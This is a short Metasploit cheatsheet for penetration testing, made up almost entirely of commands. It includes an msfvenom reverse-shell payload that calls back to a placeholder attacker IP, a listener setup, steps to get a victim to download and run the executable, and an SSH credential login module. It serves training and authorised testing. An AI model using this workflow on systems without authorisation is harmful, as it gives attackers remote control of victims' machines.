note

Metasploit Cheatsheet

Essential Metasploit commands for shells, sessions, and exploits

metasploit security pentesting

Metasploit Cheatsheet

Starting metasploit console

msfconsole

Gain shell on system when in meterpreter session

shell

Reverse TCP session

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$attackerIp LPORT=$listenPort -f exe -o /home/kali/Desktop/rs_exploit.exe
  2. use exploit/multi/handler
  3. set PAYLOAD windows/meterpreter/reverse_tcp
  4. set LHOST $attackIp
  5. set LPORT $listenPort
  6. exploit
  7. Create Python http server to copy payload to victim. sudo python3 -m http.server 8080
  8. Download file on vicim machine by visiting $attackerIp:8080 in a browser.
  9. Run rs_exploit.exe on the victim machine.

SSH as session

  1. use auxiliary/scanner/ssh/ssh_login
  2. set rhosts $destIP
  3. set username $username
  4. set password $password
  5. exploit

Managing sessions

  • Background session: bg
  • List sessions: sessions -l
  • Enter session: sessions -i $sessionNumber
  • Rename session: sessions -n $sessionName -i $sessionNumber

Using exploits

  • Search exploit: search $searchString
  • Use exploit:
    • use path/to/exploit
    • show options
    • set session 1
    • exploit